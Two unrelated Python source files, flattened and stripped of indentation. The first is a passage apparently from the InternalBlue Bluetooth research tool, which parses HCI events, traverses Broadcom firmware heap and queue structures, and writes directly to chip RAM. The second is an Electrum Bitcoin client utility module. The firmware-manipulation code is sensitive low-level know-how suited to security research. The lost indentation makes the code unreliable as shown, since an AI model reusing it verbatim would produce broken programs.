+ p8(addr_type)
+ bt_addr[::-1]
+ b"\x01\x18\x00\x28\x00\x00\x00\xd0\x07\x00\x00\x00\x00",
)
def connectionStatusCallback(self, record):
# type: (Record) -> None
"""
HCI Callback function to detect HCI Events related to
Create Connection
"""
_hcipkt = record[0]
if not issubclass(_hcipkt.__class__, hci.HCI_Event):
return
hcipkt: hci.HCI_Event = cast(hci.HCI_Event, _hcipkt) # get HCI Event packet
# Check if event is Connection Create Status Event
if hcipkt.event_code == 0x0F:
if u16(hcipkt.data[2:4]) == 0x0405: # Create Connection HCI Cmd
self.logger.info("[Connection Create initiated]")
return
# Check if event is Connection Create Complete Event
if hcipkt.event_code == 0x03:
status = hcipkt.data[0]
status_str = (
hex(status)
if status not in hcipkt.HCI_COMMAND_ERROR_STR
else hcipkt.HCI_COMMAND_ERROR_STR[status]
)
conn_handle = u16(hcipkt.data[1:3])
btaddr = hcipkt.data[3:9][::-1]
# btaddr_str = ":".join([b.encode("hex") for b in btaddr])
btaddr_str = bytes_to_hex(btaddr)
self.logger.info(
"[Connect Complete: Handle=0x%x Address=%s status=%s]"
% (conn_handle, btaddr_str, status_str)
)
# Also show Disconnect Complete
if hcipkt.event_code == 0x05:
conn_handle = u16(hcipkt.data[1:3])
self.logger.info("[Disconnect Complete: Handle=0x%x]" % (conn_handle))
def coexStatusCallback(self, record):
# type: (Record) -> None
"""
Coexistence Callback Function
Interprets debug counters for coexistence with WiFi/LTE
Call with "sendhcicmd 0xfc90"
"""
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
# Command complete event with stats
if hcipkt.event_code == 0x0E:
if u16(hcipkt.data[1:3]) == 0xFC90: # Coex Statistics Cmd
coex_grant = u32(hcipkt.data[4:8])
coex_reject = u32(hcipkt.data[8:12])
ratio = 0
if coex_grant > 0:
ratio = coex_reject / float(coex_grant)
self.logger.info(
"[Coexistence Statistics: Grant=%d Reject=%d -> Reject Ratio %.4f]"
% (coex_grant, coex_reject, ratio)
)
return
def readHeapInformation(self):
# type: () -> Optional[Union[List[HeapInformation], bool]]
"""
Traverses the double-linked list of BLOC structs and returns them as a
list of dictionaries. The dicts have the following fields:
- index: Index of the BLOC struct inside the double-linked list
- address: Address of the BLOC struct
- list_length: Number of available buffers currently in the list
- capacity: Total number of buffers belonging to the struct
- buffer_list: Head of the buffer list (single-linked list)
- memory: Address of the backing buffer in memory
- memory_size: Size of the backing buffer in memory
- buffer_size: Size of a single buffer in the list
- thread_waitlist: Head of the list of threads that wait for a buffer to become available
- waitlist_length: Length of the waiting list
- prev: Previous BLOC struct (double-linked list)
- next: Next BLOC struct (double-linked list)
- buffer_headers: Dictionary containing buffer headers (e.g. free linked list)
"""
# Check if constants are defined in fw.py
for const in ["BLOC_HEAD"]:
if const not in dir(self.fw):
self.logger.warning(
"readHeapInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return False
# Read address of first bloc struct:
first_bloc_struct_address = Address(u32(self.readMem(self.fw.BLOC_HEAD, 4)))
# Traverse the double-linked list
bloclist = []
current_bloc_struct_address = first_bloc_struct_address
for index in range(
100
): # Traverse at most 100 (don't loop forever if linked-list is corrupted)
# Parsing BLOC struct
bloc_struct = self.readMem(current_bloc_struct_address, 0x30)
# New Bloc Struct since ~2014
if "BLOC_NG" in dir(self.fw):
bloc_fields = struct.unpack("IHBBIIBB", bloc_struct[:18])
current_element = {}
current_element["index"] = index
current_element["address"] = current_bloc_struct_address
current_element["next"] = bloc_fields[0]
current_element["buffer_size"] = bloc_fields[1]
current_element["capacity"] = bloc_fields[2]
current_element["memory"] = bloc_fields[4]
current_element["buffer_list"] = bloc_fields[5]
current_element["list_length"] = bloc_fields[6]
current_element["memory_size"] = current_element["capacity"] * (
4 + current_element["buffer_size"]
)
# current_element["memory_size"] = bloc_fields[6]
# current_element["thread_waitlist"] = bloc_fields[8]
# current_element["waitlist_length"] = bloc_fields[9]
# current_element["prev"] = bloc_fields[11]
current_element["buffer_headers"] = {}
# Old BLOC Struct
else:
bloc_fields = struct.unpack("I" * 12, bloc_struct)
if bloc_fields[0] != u32(b"COLB"):
self.logger.warning(
"readHeapInformation: BLOC double-linked list contains non-BLOC element. abort."
)
return None
current_element = {}
current_element["index"] = index
current_element["address"] = current_bloc_struct_address
current_element["list_length"] = bloc_fields[2]
current_element["capacity"] = bloc_fields[3]
current_element["buffer_list"] = bloc_fields[4]
current_element["memory"] = bloc_fields[5]
current_element["memory_size"] = bloc_fields[6]
current_element["buffer_size"] = bloc_fields[7]
current_element["thread_waitlist"] = bloc_fields[8]
current_element["waitlist_length"] = bloc_fields[9]
current_element["next"] = bloc_fields[10]
current_element["prev"] = bloc_fields[11]
current_element["buffer_headers"] = {}
# Parsing buffer headers
buffer_size = current_element["buffer_size"] + 4
for buf_index in range(current_element["capacity"]):
buffer_address = current_element["memory"] + buf_index * buffer_size
hdr = u32(self.readMem(buffer_address, 4))
current_element["buffer_headers"][buffer_address] = hdr
# Append and iterate
bloclist.append(current_element)
current_bloc_struct_address = current_element["next"]
if (
current_bloc_struct_address == first_bloc_struct_address
or current_bloc_struct_address == 0
):
break
return bloclist
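# Illustrative sketch (not from the original source): summarizing the BLOC pools via
# the dictionary fields filled in above.
#
#   for bloc in internalblue.readHeapInformation() or []:
#       print("BLOC @ 0x%08x: %d/%d buffers free, buffer size %d" % (
#           bloc["address"], bloc["list_length"], bloc["capacity"], bloc["buffer_size"]))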
def readMemoryPoolStatisticsCallback(self, record):
# type: (Record) -> Optional[Union[List[MemoryPool], bool]]
"""
The chip can be put into a mode that enables displaying
memory pool statistics each second with the HCI command
0xfd1c (VSC DBFW) 0x50 (Read Memory Pool Statistics).
Extracted the info about this from a Mojave PacketLogger,
saw it once on an iPhone XS (Aladdin) in action and then
tested it on a Samsung Galaxy S10e and it works.
In contrast to the readHeapInformation command, this does
not manually traverse and check the heap. This means that
this variant is faster but cannot perform checks for
heap corruptions.
TODO: There might be more subcommands, maybe also check out
0x51 (Logging over PCIe) and 0x02 (Write Trace Config).
"""
_hcipkt = record[0]
if not issubclass(_hcipkt.__class__, hci.HCI_Event):
return
hcipkt: hci.HCI_Event = cast(hci.HCI_Event, _hcipkt) # get HCI Event packet
# Check if event is a Broadcom vendor-specific Memory Pool Statistics dump (Dump Type 8)
if hcipkt.event_code == 0xFF and hcipkt.data[0:2] == b'\x1b\x08': # Dump Type 8
self.logger.debug("[MemPool Statistics Received]")
# Pool Meta Information
pool_meta = struct.unpack("<HIIII", hcipkt.data[3:21])
meta_info = {}
meta_info["hci_count"] = pool_meta[0] # Dumped HCI Packet Count
meta_info["free_min"] = pool_meta[1] # Free Memory Min Address
meta_info["free_max"] = pool_meta[2] # Free Memory Max Address Plus One
meta_info["time"] = pool_meta[3] # Timestamp
meta_info["rfu"] = pool_meta[4] # RFU
self.logger.debug(meta_info)
# Individual Pool Information
pool_list = []
pool_len = hcipkt.data[2] # Number of Pools
for index in range(pool_len):
pool_fields = struct.unpack("<IIIHHHHHH", hcipkt.data[21 + (index * 24):21 + ((index + 1) * 24)])
current_element = {}
current_element["index"] = index
current_element["base"] = pool_fields[0] # Base
current_element["first"] = pool_fields[1] # First Free
current_element["name"] = pool_fields[2].to_bytes(4, byteorder='little').decode('utf-8') # Name
current_element["size"] = pool_fields[3] # Block Size
current_element["count"] = pool_fields[4] # Block Count
current_element["low"] = pool_fields[5] # Low Watermark
current_element["allocated"] = pool_fields[6] # Allocated Blocks
current_element["free"] = pool_fields[7] # Free Blocks
current_element["die"] = pool_fields[8] # Die Reserve Count
self.logger.debug(current_element)
pool_list.append(current_element)
# We are called asynchronously, so the returned list never reaches the
# command line; log a formatted summary instead.
self.logger.info((
"\n> Pools at {time}, Min Addr 0x{free_min:06X}, "
"Max Addr 0x{free_max:06X}"
).format(**meta_info))
self.logger.info(" Name @ Base: Size Alloc / Cnt 1st Free Low Die ")
self.logger.info(" ----------------------------------------------------------")
for pool in pool_list:
self.logger.info((
" {name} @ 0x{base:06X}: {size:6d}"
" {allocated:3d} / {count:3d} "
"0x{first:06X} {low:3d} {die:3d}"
).format(**pool))
return pool_list
return
def readQueueInformation(self):
# type: () -> Optional[List[QueueElement]]
"""
Traverses the double-linked list of QUEUE structs and returns them as a
list of dictionaries. The dicts have the following fields:
- index: Index of the QUEUE struct inside the double-linked list
- address: Address of the QUEUE struct
- item_size: Size of a single queue item (in Byte)
- capacity: Total number of queue items belonging to the struct
- available_items: Number of valid queue items ready to be retrieved
- free_slots: Number of free item slots
- queue_buf_start: Pointer to the beginning of the queue buffer
- queue_buf_end: Pointer to the end of the queue buffer
- next_item: Pointer to the next item to be retrieved from the queue
- next_free_slot: Pointer to the next free item slot to be filled
- thread_waitlist: Head of the list of threads that wait for a buffer to become available
- waitlist_length: Length of the waiting list
- prev: Previous QUEUE struct (double-linked list)
- next: Next QUEUE struct (double-linked list)
- items: List of queue items (raw bytes)
- name: Name of the queue (from reverse engineering its usage)
"""
# Check if constants are defined in fw.py
for const in ["QUEUE_HEAD"]:
if const not in dir(self.fw):
self.logger.warning(
"readQueueInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return None
# Read address of first queue struct:
first_queue_struct_address = u32(self.readMem(self.fw.QUEUE_HEAD, 4))
# Traverse the double-linked list
queuelist = []
current_queue_struct_address = first_queue_struct_address
for index in range(
100
): # Traverse at most 100 (don't loop forever if linked-list is corrupted)
queue_struct = self.readMem(current_queue_struct_address, 0x38)
queue_fields = struct.unpack("I" * 14, queue_struct)
if queue_fields[0] != u32(b"UEUQ"):
self.logger.warning(
"readQueueInformation: QUEUE double-linked list contains non-QUEU element. abort."
)
return None
current_element = QueueElement(
index,
current_queue_struct_address,
queue_fields[2] * 4,
queue_fields[3],
queue_fields[4],
queue_fields[5],
queue_fields[6],
queue_fields[7],
queue_fields[8],
queue_fields[9],
queue_fields[10],
queue_fields[11],
queue_fields[12],
queue_fields[13],
self.fw.QUEUE_NAMES[index],
)
queuelist.append(current_element)
current_queue_struct_address = current_element["next"]
if current_queue_struct_address == first_queue_struct_address:
break
return queuelist
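# Illustrative sketch (not from the original source): printing queue fill levels; the
# field names follow the docstring above, and item-style access is assumed to work
# the same way as current_element["next"] does in the loop.
#
#   for q in internalblue.readQueueInformation() or []:
#       print("%s: %d/%d items" % (q["name"], q["available_items"], q["capacity"]))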
def enableBroadcomDiagnosticLogging(self, enable):
# type: (bool) -> None
"""
Broadcom implemented their own H4 layer protocol. Normally H4 handles HCI
messages like HCI commands, SCO and ACL data, and HCI events. Their types are
0x01-0x04. Broadcom's proprietary message type 0x07 is used for diagnostic
messages.
Enabling diagnostic logging sets a firmware variable that is checked for every
LMP/LCP message on send and receive; when it is set, the message contents are
forwarded to the host prepended with 0x07.
In principle, diagnostic logging can be enabled on Android by directly
writing to the serial Bluetooth device:
echo -ne '\x07\xf0\x01' >/dev/ttyHS
However, Android's Bluetooth driver does not properly parse message type 0x07.
This causes the driver to crash when enabling diagnostics like this. A
custom Bluetooth driver is required, which accepts diagnostic commands
and also forwards diagnostic message outputs to the BT Snoop Log.
"""
if not self.serial:
self.sendH4(hci.HCI.BCM_DIAG, b"\xf0" + (b"\x01" if enable else b"\x00"))
# We can send the activation to the serial, but then the Android driver
# itself crashes when receiving diagnostic frames...
else:
self.logger.warning("Diagnostic protocol requires modified Android driver!")
def enableEnhancedAdvReport(self):
# type: () -> bool
"""
Broadcom and Cypress chips can extend the "Event Type" field in LE Advertising
Reports with information on the channel, antenna, and scan mode.
Parsing this enhanced advertisement report is "documented" in the PacketDecoder
binary of Apple's PacketLogger, which is part of the Additional Tools for XCode.
The function parsing these is called `leAdvertisingEventTypeString` (XCode 11.4).
Usually, the Event Type field is set to 0x00-0x04, meaning ADV_IND..SCAN_RSP.
Additional fields:
channel = (event_type >> 4) & 7
antenna = event_type & 0x80
scan_mode = (event_type >> 3) & 3
The channel is a value 0--2, which corresponds to 37--39.
The antenna is 0 for BT and 1 for WLAN.
No idea about the scan mode ;)
The Broadcom and Cypress firmware sets these additional fields when the firmware
flag `bEnhancedAdvReport` is set. We do not know how to set it via VSC HCI and if that
is possible, so we set it by directly writing to RAM.
TODO: Also implement for the MacBook 2016, it's at 0x2037D0, but we don't know
the current LMP version, as it changes with each macOS patch level.
Won't Fix:
* The Nexus 5 BLE implementation is too old, `lculp_HandleScanReport` (0x184D0) and
`_scanTaskRxHeaderDone` (0x16E74) do not reference this flag yet.
* Also seems to be missing in the Nexus 6P/Samsung Galaxy S6 but didn't check as careful.
Returns true if the feature is supported and could be enabled.
"""
# Check if constants are defined in fw.py
if "ENHANCED_ADV_REPORT_ADDRESS" not in dir(self.fw):
self.logger.warning(
"enableEnhancedAdvReport: 'ENHANCED_ADV_REPORT_ADDRESS' not in fw.py. FEATURE NOT SUPPORTED!"
)
return False
self.writeMem(self.fw.ENHANCED_ADV_REPORT_ADDRESS, b'\x01\x00\x00\x00')
return True
def _setupSockets(self):
raise NotImplementedError()
def _teardownSockets(self):
raise NotImplementedError()
util.py
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import binascii
import os, sys, re, json, time
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
base_units = {'BTC':8, 'mBTC':5, 'uBTC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
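# Example (illustration, not from the original source): trailing ".0" groups are
# stripped before splitting, so normalize_version("3.0.5.0") == [3, 0, 5] and
# normalize_version("2.10") == [2, 10].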
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Raise this exception to unwind the stack like when an error occurs;
# however, unlike other exceptions, the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
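# Illustrative usage (not from the original source): decorating a function prints its
# runtime via print_error() on every call when verbose output is enabled.
#
#   @profiler
#   def load_history(wallet):
#       ...
#
#   # -> "[profiler] load_history 0.1234"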
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh_builder = lambda x: bytes.fromhex(x)
def hfu(x):
"""
py2-py3 aware wrapper for str.encode('hex')
:param x: str
:return: str
"""
assert_bytes(x)
return binascii.hexlify(x)
def bfh(x):
"""
py2-py3 aware wrapper to "bytes.fromhex()" func
:param x: str
:rtype: bytes
"""
if isinstance(x, str):
return bfh_builder(x)
# TODO: check for iterator interface
elif isinstance(x, (list, tuple, map)):
return [bfh(sub) for sub in x]
else:
raise TypeError('Unexpected type: ' + str(type(x)))
def bh2u(x):
"""
unicode with hex representation of bytes()
e.g. x = bytes([1, 2, 10])
    bh2u(x) -> '01020a'
:param x: bytes
:rtype: str
"""
assert_bytes(x)
return binascii.hexlify(x).decode('ascii')
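# Illustrative sketch, not part of the original module: the bfh/bh2u/hfu
# helpers round-trip between hex strings and bytes (hexlify is lowercase).
def _demo_hex_roundtrip():
    raw = bfh('01020a')
    assert raw == bytes([1, 2, 10])
    assert bh2u(raw) == '01020a'        # str
    assert hfu(raw) == b'01020a'        # bytes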
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
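# Illustrative sketch, not part of the original module: with the default
# decimal_point=8 (satoshis to BTC) trailing zeros and the trailing '.' are
# stripped; Decimal comes from this module's imports.
def _demo_format_satoshis_plain():
    assert format_satoshis_plain(123456789) == '1.23456789'
    assert format_satoshis_plain(100000000) == '1'
    assert format_satoshis_plain(150000000, decimal_point=5) == '1500'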
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
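# Illustrative sketch, not part of the original module: how the bucketing in
# time_difference() behaves; age() then appends " ago" or prepends "in "
# depending on whether from_date is in the past or the future.
def _demo_time_difference():
    from datetime import timedelta
    assert time_difference(timedelta(minutes=30), False) == '30 minutes'
    assert time_difference(timedelta(hours=3), False) == 'about 3 hours'
    assert time_difference(timedelta(days=2), False) == '2 days'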
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain',
{'tx': 'transactions', 'addr': 'addresses'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp',
{'tx': 'Transaction', 'addr': 'Address'}),
'Blockchain.info': ('https://blockchain.info',
{'tx': 'tx', 'addr': 'address'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion',
{'tx': 'tx', 'addr': 'address'}),
'Blockr.io': ('https://btc.blockr.io',
{'tx': 'tx/info', 'addr': 'address/info'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC',
{'tx': 'tx', 'addr': 'address'}),
'BTC.com': ('https://chain.btc.com',
{'tx': 'tx', 'addr': 'address'}),
'Chain.so': ('https://www.chain.so',
{'tx': 'tx/BTC', 'addr': 'address/BTC'}),
'Insight.is': ('https://insight.bitpay.com',
{'tx': 'tx', 'addr': 'address'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain',
{'tx': 'tx', 'addr': 'address'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc',
{'tx': 'tx', 'addr': 'address'}),
'Blockchair.com': ('https://blockchair.com/bitcoin',
{'tx': 'transaction', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
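# Illustrative sketch, not part of the original module: a plain dict works as
# the config here because only .get() with a default is needed.  With the
# default 'Blocktrail.com' entry and mainnet (bitcoin.TESTNET false), the
# pieces are joined into an https URL; the txid below is a made-up placeholder.
def _demo_block_explorer_url():
    fake_config = {}
    url = block_explorer_URL(fake_config, 'tx', 'ff' * 32)
    assert url == 'https://www.blocktrail.com/BTC/tx/' + 'ff' * 32
    assert block_explorer_URL(fake_config, 'unknown-kind', 'x') is None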
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
    if 'message' in out:
        out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
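# Illustrative sketch, not part of the original module: for a BIP21-style URI
# such as  bitcoin:<valid address>?amount=0.001&message=donation  the function
# above returns roughly
#   {'address': <address>, 'amount': 100000, 'message': 'donation', 'memo': 'donation'}
# i.e. the amount is scaled to satoshis via COIN, and the address must pass
# bitcoin.is_address() or a BaseException is raised.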
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
